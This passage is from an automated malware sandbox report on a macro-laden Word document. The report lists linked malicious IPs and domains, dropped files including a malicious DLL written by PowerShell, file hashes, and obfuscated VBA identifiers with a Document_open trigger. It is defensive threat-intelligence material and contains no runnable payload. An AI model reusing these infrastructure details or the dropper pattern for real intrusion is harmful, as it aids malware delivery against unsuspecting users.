                                          • ambiancemedicalspa.com/application/favicon.ico

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          shannared.comNotice 8283393_829.docGet hashmaliciousBrowse
                                          • 192.169.223.13

                                          ASN

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          OVHFRDocument_PDF.exeGet hashmaliciousBrowse
                                          • 51.195.53.221
                                          SecuriteInfo.com.Variant.Zusy.363976.21086.exeGet hashmaliciousBrowse
                                          • 54.39.198.228
                                          ARCH 05 2_80074.docGet hashmaliciousBrowse
                                          • 144.217.190.240
                                          PO NO 214000070.docGet hashmaliciousBrowse
                                          • 94.23.169.237
                                          pol.docGet hashmaliciousBrowse
                                          • 94.23.169.237
                                          RFQ 20210125.docGet hashmaliciousBrowse
                                          • 94.23.169.237
                                          REQUEST FOR QUOTATION.docGet hashmaliciousBrowse
                                          • 94.23.169.237
                                          BANK DETAILS.docGet hashmaliciousBrowse
                                          • 94.23.169.237
                                          PO NO -214000070.docGet hashmaliciousBrowse
                                          • 94.23.169.237
                                          SecuriteInfo.com.Generic.mg.b70d9bf0d6567964.dllGet hashmaliciousBrowse
                                          • 158.69.118.130
                                          SecuriteInfo.com.Artemis5EFC4C46397A.dllGet hashmaliciousBrowse
                                          • 158.69.118.130
                                          SecuriteInfo.com.Generic.mg.75b2def6a7e110ad.dllGet hashmaliciousBrowse
                                          • 158.69.118.130
                                          SecuriteInfo.com.Generic.mg.32d178838c0fd41b.dllGet hashmaliciousBrowse
                                          • 158.69.118.130
                                          SecuriteInfo.com.Artemis8353855AD729.dllGet hashmaliciousBrowse
                                          • 158.69.118.130
                                          SecuriteInfo.com.Generic.mg.b817172e5515b1af.dllGet hashmaliciousBrowse
                                          • 158.69.118.130
                                          SecuriteInfo.com.ArtemisAA8578417627.dllGet hashmaliciousBrowse
                                          • 158.69.118.130
                                          SecuriteInfo.com.Artemis58690C2E2BCA.dllGet hashmaliciousBrowse
                                          • 158.69.118.130
                                          SecuriteInfo.com.ArtemisTrojan.dllGet hashmaliciousBrowse
                                          • 158.69.118.130
                                          SecuriteInfo.com.Generic.mg.0551f32bbe68c20b.dllGet hashmaliciousBrowse
                                          • 158.69.118.130
                                          SecuriteInfo.com.Artemis961F6F63FB8F.dllGet hashmaliciousBrowse
                                          • 158.69.118.130
                                          RCS-RDS73-75DrStaicoviciRObin.shGet hashmaliciousBrowse
                                          • 5.14.105.137
                                          Notice 8283393_829.docGet hashmaliciousBrowse
                                          • 84.232.229.24
                                          MENSAJE.docGet hashmaliciousBrowse
                                          • 84.232.229.24
                                          MENSAJE.docGet hashmaliciousBrowse
                                          • 84.232.229.24
                                          MES-2021_01_22-3943960.docGet hashmaliciousBrowse
                                          • 84.232.229.24
                                          Documento 2201 01279.docGet hashmaliciousBrowse
                                          • 84.232.229.24
                                          DATI 2021.docGet hashmaliciousBrowse
                                          • 84.232.229.24
                                          informazioni 536-32772764.docGet hashmaliciousBrowse
                                          • 84.232.229.24
                                          Meddelelse-58931636.docGet hashmaliciousBrowse
                                          • 84.232.229.24
                                          doc_2201_3608432.docGet hashmaliciousBrowse
                                          • 84.232.229.24
                                          13-2021.docGet hashmaliciousBrowse
                                          • 84.232.229.24
                                          MAIL-224201 277769577.docGet hashmaliciousBrowse
                                          • 84.232.229.24
                                          Arch_05_222-3139.docGet hashmaliciousBrowse
                                          • 5.2.136.90
                                          MENSAJE 2021.docGet hashmaliciousBrowse
                                          • 5.2.136.90
                                          Documento_0501_012021.docGet hashmaliciousBrowse
                                          • 5.2.136.90
                                          Datos_019_9251.docGet hashmaliciousBrowse
                                          • 5.2.136.90
                                          document_84237-299265042.docGet hashmaliciousBrowse
                                          • 5.2.136.90
                                          ARCH-012021-21-1934.docGet hashmaliciousBrowse
                                          • 5.2.136.90
                                          Mensaje K-158701.docGet hashmaliciousBrowse
                                          • 5.2.136.90
                                          Datos-2021-4-377562.docGet hashmaliciousBrowse
                                          • 5.2.136.90
                                          ONEANDONE-ASBrauerstrasse48DEBestellung.docGet hashmaliciousBrowse
                                          • 212.227.200.73
                                          N00048481397007.docGet hashmaliciousBrowse
                                          • 212.227.200.73
                                          N00048481397007.docGet hashmaliciousBrowse
                                          • 212.227.200.73
                                          MENSAJE.docGet hashmaliciousBrowse
                                          • 212.227.200.73
                                          MENSAJE.docGet hashmaliciousBrowse
                                          • 212.227.200.73
                                          Archivo_AB-96114571.docGet hashmaliciousBrowse
                                          • 212.227.200.73
                                          5390080_2021_1-259043.docGet hashmaliciousBrowse
                                          • 212.227.200.73
                                          5390080_2021_1-259043.docGet hashmaliciousBrowse
                                          • 212.227.200.73
                                          GV52H7XsQ2.exeGet hashmaliciousBrowse
                                          • 217.76.142.246
                                          Shipping Document PL&BL Draft.exeGet hashmaliciousBrowse
                                          • 74.208.236.161
                                          13-2021.docGet hashmaliciousBrowse
                                          • 88.208.252.128
                                          mallware.exeGet hashmaliciousBrowse
                                          • 212.227.15.142
                                          Messaggio 2001 2021 3-4543.docGet hashmaliciousBrowse
                                          • 88.208.252.128
                                          sLUAeV5Er6.exeGet hashmaliciousBrowse
                                          • 74.208.236.196
                                          SecuriteInfo.com.Trojan.PackedNET.507.23078.exeGet hashmaliciousBrowse
                                          • 74.208.236.121
                                          SCAN_52858535.docGet hashmaliciousBrowse
                                          • 88.208.252.128
                                          QtEQhJpxAt.exeGet hashmaliciousBrowse
                                          • 216.250.120.149
                                          1tqW2LLr74.exeGet hashmaliciousBrowse
                                          • 217.160.0.94
                                          PAP001.exeGet hashmaliciousBrowse
                                          • 212.227.15.158
                                          PO-RY 001-21 Accuri.jarGet hashmaliciousBrowse
                                          • 217.160.0.179

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B6528223-1CF8-4E74-AA78-05F4F57053A0}.tmp
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1024
                                          Entropy (8bit):0.05390218305374581
                                          Encrypted:false
                                          SSDEEP:3:ol3lYdn:4Wn
                                          MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                          SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                          SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                          SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                          Malicious:false
                                          Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E52EFAE2-E64E-47DE-AFA9-74F75F545893}.tmp
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1536
                                          Entropy (8bit):1.3586208805849456
                                          Encrypted:false
                                          SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbh:IiiiiiiiiifdLloZQc8++lsJe1Mzgl
                                          MD5:48AC909EB7F8D8BEABCD794C602AAAA6
                                          SHA1:044A7BB11F83B4D4F48D139ACBCBBB24F3E57071
                                          SHA-256:FF7A863D84CAD97CB083EBC8CE73B745B8C5775369BDBEB9A87184FB2EC6C21F
                                          SHA-512:8EE8FA5B09C7653CE716039093B7A0CDB1D0E59CEF547D292A4943D51676513EA5120C9A673B42FC5E52CB8611325C4D53C24E20C3F489FAA850290A856C3F99
                                          Malicious:false
                                          Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Arch_2021_717-1562532.LNK
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:16 2020, mtime=Wed Aug 26 14:08:16 2020, atime=Tue Jan 26 20:32:39 2021, length=175616, window=hide
                                          Category:dropped
                                          Size (bytes):2138
                                          Entropy (8bit):4.506414517804054
                                          Encrypted:false
                                          SSDEEP:48:8U/XTFGqV6tXh7PxuKl4Qh2U/XTFGqV6tXh7PxuKl4Q/:8U/XJGqV6nA+4Qh2U/XJGqV6nA+4Q/
                                          MD5:3DF534EC80F3C85FA76714DB4292A786
                                          SHA1:C6596785338E721E83AE53A1713F291F520E1774
                                          SHA-256:77528ECB6AFA7D2107028B55354F4F7AD70CA81FBF541EB8C946AD6F92B6CFB6
                                          SHA-512:45FF10CFB6846FAF5D2B9A556D5CB2D7F44D63F83C402D967EB76772EA8370AF25E29C1BF1ED0991ADD4EEA0DFECDFE1F35A674FF711FE96D239ACED6304A4F7
                                          Malicious:false
                                          Preview: L..................F.... ....k...{...k...{...P..*................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....|.2.....:R.. .ARCH_2~1.DOC..`.......Q.y.Q.y*...8.....................A.r.c.h._.2.0.2.1._.7.1.7.-.1.5.6.2.5.3.2...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\701188\Users.user\Desktop\Arch_2021_717-1562532.doc.0.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.A.r.c.h._.2.0.2.1._.7.1.7.-.1.5.6.2.5.3.2...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......701188.........
                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):101
                                          Entropy (8bit):4.393650502691884
                                          Encrypted:false
                                          SSDEEP:3:M1yU5LI19C8X7U5LI19CmX1yU5LI19Cv:M1JAQJgJ9
                                          MD5:61CF076A207D61DD7CFDFF72AFC003B1
                                          SHA1:E5EB1D15A681CBD472A5DF144C48E9CED0F974F9
                                          SHA-256:48C3B72F2DA19C13AF0067FFFD8DB45539F934BEA6F11942C2619BD6A2DB1FA6
                                          SHA-512:38E9B97416C9AC7831DAEF8589D09DBFF79133DEC1A88AB5206188AD6A6373BD67D74E0179CB5EF898FB7A23E53B12E8181BA2BFD23965254CE73C18AFBB0EB4
                                          Malicious:false
                                          Preview: [doc]..Arch_2021_717-1562532.LNK=0..Arch_2021_717-1562532.LNK=0..[doc]..Arch_2021_717-1562532.LNK=0..
                                          C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):162
                                          Entropy (8bit):2.431160061181642
                                          Encrypted:false
                                          SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                                          MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                                          SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                                          SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                                          SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                                          Malicious:false
                                          Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...
                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XU9O8G9A8UDMPEGZGHPP.temp
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):8016
                                          Entropy (8bit):3.578544938206285
                                          Encrypted:false
                                          SSDEEP:96:chQCsMqLVqvsqvJCwoo4z8hQCsMqLVqvsEHyqvJCwore4zvVYL+H74f8ObdlUVqG:cy8obz8yIHnortzvCf8OYIu
                                          MD5:E1114DE40553EDCA03926BA0A011A227
                                          SHA1:8F1C315F170DF90D8B5FFA086FCB2BE434D5F415
                                          SHA-256:6AC06135063C5F088190B1A144512162BDBFDA8E4635B157E6386EDE56DBD9F8
                                          SHA-512:EA88FD7B61D0A03352D40A26503B4378193036B1EA1D8DD21A8F2F2F80A035EA7311C65BE6BDE78CE57E55E04D3001D897DD9DD8444952E228B2540A5CC27380
                                          Malicious:false
                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                          C:\Users\user\Desktop\~$ch_2021_717-1562532.doc
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):162
                                          Entropy (8bit):2.431160061181642
                                          Encrypted:false
                                          SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                                          MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                                          SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                                          SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                                          SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                                          Malicious:false
                                          Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...
                                          C:\Users\user\Kaktksw\An6othh\N49I.dll
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):631808
                                          Entropy (8bit):6.9127096471964675
                                          Encrypted:false
                                          SSDEEP:12288:OYzchQVZnkmt/70MWugxPJZFpf0c1pH/bdJ8CA88fzsBsI3+Dc:B4KV5Hpt8bZHLp+CSfasO+
                                          MD5:E09F65C1A92653035B27E603980CB205
                                          SHA1:78DCA7A2190C82DC8DC4A0EAC302379804C79AA9
                                          SHA-256:D09BACE1490F6EE322262FF2DA373E861F3B3B9BC03C386CE8A031648F1EAA4F
                                          SHA-512:5D55BC984F6A044877912CBE0BA40DE0210CF25C7E4FB32CBE6DB9D5C60306280CD5EC84DF1674024CA89AD67FA49F7AA55CF5BCEAE458D90CE6D86CF209D8D3
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 55%
                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................0...p.......>.......@....@..........................................................................p..."...............................n..................................................................................CODE.............0.................. ..`DATA.........@.......4..............@...BSS..........`.......J...................idata..."...p...$...J..............@....reloc...n.......p...n..............@..P.rsrc...............................@..P....................................@..P........................................................................................................................................................................................................................

                                          Static File Info

                                          General

                                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Et odit non optio. Aut reprehenderit eaque ullam. Labore dignissimos rerum rerum voluptas quod et aut assumenda. Qui sed eos sit suscipit., Author: Victoria Murillo, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Jan 25 09:28:00 2021, Last Saved Time/Date: Mon Jan 25 09:28:00 2021, Number of Pages: 1, Number of Words: 5622, Number of Characters: 32047, Security: 8
                                          Entropy (8bit):6.649833118657555
                                          TrID:
                                          • Microsoft Word document (32009/1) 79.99%
                                          • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                                          File name:Arch_2021_717-1562532.doc
                                          File size:175104
                                          MD5:d8358bce25bf7488068cfa9490205833
                                          SHA1:35c09dac297f82402a99de172600ba40d87c3ab7
                                          SHA256:b253cf724dd411f9a433e2595d82ee412c28ae67c09ea0538d382334f2684f10
                                          SHA512:35fa8ecc7500a603d88f03272a949a6439d19e1d89a9ef7dcbe2f9cc425d67896ddc3caa43cd88f2e979d4f63e8d061f7725074b308ec3aca96b11999e75f32e
                                          SSDEEP:1536:OJlTNVRcrrMUXyaJBsc3txOOgvWJVTjxo4Iri1R1ffFdRny8Z:+TdcrrXyQBsc0vWJVi4IrwVPRX
                                          File Content Preview:........................>................................... ..................................................................................................................................................................................................

                                          File Icon

                                          Icon Hash:e4eea2aaa4b4b4a4

                                          Static OLE Info

                                          General

                                          Document Type:OLE
                                          Number of OLE Files:1

                                          OLE File "Arch_2021_717-1562532.doc"

                                          Indicators

                                          Has Summary Info:True
                                          Application Name:Microsoft Office Word
                                          Encrypted Document:False
                                          Contains Word Document Stream:True
                                          Contains Workbook/Book Stream:False
                                          Contains PowerPoint Document Stream:False
                                          Contains Visio Document Stream:False
                                          Contains ObjectPool Stream:
                                          Flash Objects Count:
                                          Contains VBA Macros:True

                                          Summary

                                          Code Page:1252
                                          Title:Et odit non optio. Aut reprehenderit eaque ullam. Labore dignissimos rerum rerum voluptas quod et aut assumenda. Qui sed eos sit suscipit.
                                          Subject:
                                          Author:Victoria Murillo
                                          Keywords:
                                          Comments:
                                          Template:
                                          Last Saved By:
                                          Revion Number:1
                                          Total Edit Time:0
                                          Create Time:2021-01-25 09:28:00
                                          Last Saved Time:2021-01-25 09:28:00
                                          Number of Pages:1
                                          Number of Words:5622
                                          Number of Characters:32047
                                          Creating Application:Microsoft Office Word
                                          Security:8

                                          Document Summary

                                          Document Code Page:-535
                                          Number of Lines:267
                                          Number of Paragraphs:75
                                          Thumbnail Scaling Desired:False
                                          Company:Zapata - de Anda
                                          Contains Dirty Links:False
                                          Shared Document:False
                                          Changed Hyperlinks:False
                                          Application Version:917504

                                          Streams with VBA

                                          VBA File Name: A5ate73kc6cw5njy, Stream Size: 1173
                                          General
                                          Stream Path:Macros/VBA/A5ate73kc6cw5njy
                                          VBA File Name:A5ate73kc6cw5njy
                                          Stream Size:1173
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . n < . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:01 16 01 00 00 f0 00 00 00 04 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 0b 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 de 6e 3c 87 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                          VBA Code Keywords

                                          Keyword
                                          False
                                          Private
                                          VB_Exposed
                                          Attribute
                                          VB_Name
                                          VB_Creatable
                                          Document_open()
                                          VB_PredeclaredId
                                          VB_GlobalNameSpace
                                          VB_Base
                                          VB_Customizable
                                          VB_TemplateDerived
                                          VBA Code
                                          VBA File Name: Gusca95luq_, Stream Size: 14646
                                          General
                                          Stream Path:Macros/VBA/Gusca95luq_
                                          VBA File Name:Gusca95luq_
                                          Stream Size:14646
                                          Data ASCII:. . . . . . . . . d . . . . . . . . . . . . . . . l . . . . , . . . . . . . . . . . n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:01 16 01 00 00 f0 00 00 00 64 10 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 6c 10 00 00 1c 2c 00 00 00 00 00 00 01 00 00 00 de 6e b6 8e 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                          VBA Code Keywords

                                          Keyword
                                          uldHRAc
                                          BJMbZuJRF
                                          xBaZq)
                                          Const
                                          BvPhx
                                          PTpduh
                                          prhgQCFm
                                          Error
                                          Split(urqwC,
                                          IKEyYJ
                                          cHCfACCC()
                                          fsCkG
                                          ndrons
                                          Split(HYqcb,
                                          Split(fsCkG,
                                          lHXavB
                                          DunxEHX
                                          Split(sHhQm,
                                          WPKmFe
                                          ixJTYF
                                          dFuMF
                                          RcxFVMDOH()
                                          vEmIAMH
                                          BvPhx)
                                          RcxFVMDOH
                                          clPKFBjz
                                          SzdUE
                                          HIXwxDo
                                          urqwC
                                          BJMbZuJRF)
                                          LnRqcjdHC
                                          lhhIDAA)
                                          mnSyJHAv()
                                          JaknVR)
                                          Split(WPKmFe,
                                          JtcSFJR()
                                          xBaZq
                                          AQJEzpnoG
                                          mxkikw
                                          Array((qtNpWFzCE),
                                          SVfwH)
                                          DObDSSSH
                                          "ndpns
                                          kWUSef
                                          mnSyJHAv
                                          IkIlHED)
                                          yNpnD
                                          riWqFGJY
                                          pqwm,
                                          lrUBAA
                                          TjMQdBBgE
                                          ZJSnRBDm)
                                          espWEuWIh
                                          JjJbB
                                          sHhQm
                                          OOobG
                                          OOobG()
                                          CNUcG
                                          Split(nvNjhAFA,
                                          Array((eBzEFGPxh),
                                          uZukAmEA
                                          qtNpWFzCE
                                          Array((KAAmsFJLa),
                                          Range:
                                          eGHABDHYI
                                          Array((LpCFBdE),
                                          "*high*,*critic*"
                                          WzIrJQJ
                                          tWLOCW
                                          Array((yNpnD),
                                          xjjUNmJ
                                          WiAHIOige
                                          vEmIAMH:
                                          VHxfT
                                          kXidGGmrk()
                                          DGpFCB
                                          mjbBYHhbs
                                          wJdJAI)
                                          Array((dvuZzGDnA),
                                          Split(DSEaFYQ,
                                          DGpFCB()
                                          Split(rSrZBJJv,
                                          otHyDQA
                                          ZJSnRBDm
                                          String
                                          sujuoHFCJ
                                          YtjFBe:
                                          aACrBzCHd
                                          PEoELvIQJ()
                                          Array((cyDODgZgJ),
                                          kRgnIQJCn
                                          SVfwH
                                          rSrZBJJv
                                          zYRcUHEHG
                                          prhgQCFm:
                                          Split(XlUFJHR,
                                          Nothing
                                          Split(sujuoHFCJ,
                                          VcboAE
                                          XpIXCDhMq
                                          ArMYJEkJb:
                                          fEDGCAg
                                          PASRFGECE
                                          PASRFGECE()
                                          ctRAim
                                          jyxYAFLC
                                          QFAdJG:
                                          Array((muQUuJD),
                                          eBzEFGPxh
                                          Split(ctRAim,
                                          vDIdCwGfT
                                          Split(XpIXCDhMq,
                                          PCtZE)
                                          yPcgGA
                                          NYPQCHF
                                          ZDKqIFEBG()
                                          nd:wns
                                          OwqxzJE)
                                          kXidGGmrk
                                          xfQswJFE
                                          Resume
                                          tCOXBDEPL
                                          VHxfT:
                                          OwqxzJE
                                          ortGB
                                          NFoIZAgdj
                                          DunxEHX()
                                          wJdJAI
                                          ifTgDoG)
                                          hxzoFBtLC
                                          HYqcb
                                          Split(fEDGCAg,
                                          PwyZCI
                                          ndgmns
                                          NGzByr
                                          ffeODEi:
                                          PTpduh:
                                          jzCVAIVG
                                          cpeHA
                                          UTlaBhGD:
                                          nEsTCdYDH
                                          Array((huVBjtENv),
                                          ndinns
                                          elqXMZ:
                                          xnvME()
                                          HKXrDBEI
                                          JaknVR
                                          Array((jyxYAFLC),
                                          Mid(skuwd,
                                          Target)
                                          bpMND
                                          LXXQDDfJ
                                          PCtZE
                                          Split(TjMQdBBgE,
                                          AQJEzpnoG:
                                          gvcgAIUM
                                          sOfSqNO
                                          tCOXBDEPL()
                                          MhDEGJ()
                                          NGzByr:
                                          ortGB:
                                          pNdoqWCxt)
                                          SbmMCGuEY
                                          zYRcUHEHG:
                                          IOPMfG()
                                          nvNjhAFA
                                          elqXMZ
                                          Array((DObDSSSH),
                                          Split(NvjyW,
                                          JvTSZI
                                          IkIlHED
                                          ffeODEi
                                          XlUFJHR
                                          DSEaFYQ
                                          AQOwDFGF
                                          UTlaBhGD
                                          UsjaB
                                          ndmns
                                          WiAHIOige:
                                          Attribute
                                          IUHjJ
                                          uZukAmEA()
                                          NYPQCHF)
                                          Split(riWqFGJY,
                                          PmuwJBJH
                                          LpCFBdE
                                          IOPMfG
                                          ndsns
                                          aACrBzCHd()
                                          Array((eGHABDHYI),
                                          huVBjtENv
                                          Array((SbmMCGuEY),
                                          Array((xfQswJFE),
                                          ZDKqIFEBG
                                          DKUOJzi
                                          kWUSef:
                                          cyDODgZgJ
                                          KAAmsFJLa
                                          VB_Name
                                          CNUcG()
                                          wdpnM
                                          Content
                                          Array((dFuMF),
                                          Split(VcboAE,
                                          tWLOCW()
                                          dvuZzGDnA
                                          Split(cpeHA,
                                          Function
                                          xnvME
                                          JtcSFJR
                                          ixJTYF)
                                          Array((IKEyYJ),
                                          VZWOFv()
                                          AQOwDFGF:
                                          oAcbS
                                          tuLCMCI
                                          JvTSZI:
                                          cjdFFEGu
                                          hxzoFBtLC)
                                          rykKLTfBV
                                          HsRXzxA
                                          ndtns
                                          FGWgu
                                          VZWOFv
                                          YtjFBe
                                          nd_ns
                                          dBZlAG)
                                          Array((WzIrJQJ),
                                          Array((zHRlEdEP),
                                          cHCfACCC
                                          Len(skuwd))
                                          ifTgDoG
                                          QFAdJG
                                          Array((SzdUE),
                                          PEoELvIQJ
                                          Array((bpMND),
                                          NFoIZAgdj)
                                          Split(sOfSqNO,
                                          pNdoqWCxt
                                          Split(PmuwJBJH,
                                          ArMYJEkJb
                                          UsjaB)
                                          lhhIDAA
                                          MhDEGJ
                                          zHRlEdEP
                                          muQUuJD
                                          Mid(Application.Name,
                                          Array((jzCVAIVG),
                                          Split(JjJbB,
                                          LnRqcjdHC:
                                          NvjyW
                                          String:
                                          uldHRAc)
                                          PdrYYCtJ
                                          IUHjJ:
                                          otHyDQA()
                                          yPcgGA)
                                          HsRXzxA:
                                          skuwd
                                          dBZlAG
                                          VBA Code
                                          VBA File Name: Zcf1kk3t2ssv4r07m, Stream Size: 704
                                          General
                                          Stream Path:Macros/VBA/Zcf1kk3t2ssv4r07m
                                          VBA File Name:Zcf1kk3t2ssv4r07m
                                          Stream Size:704
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
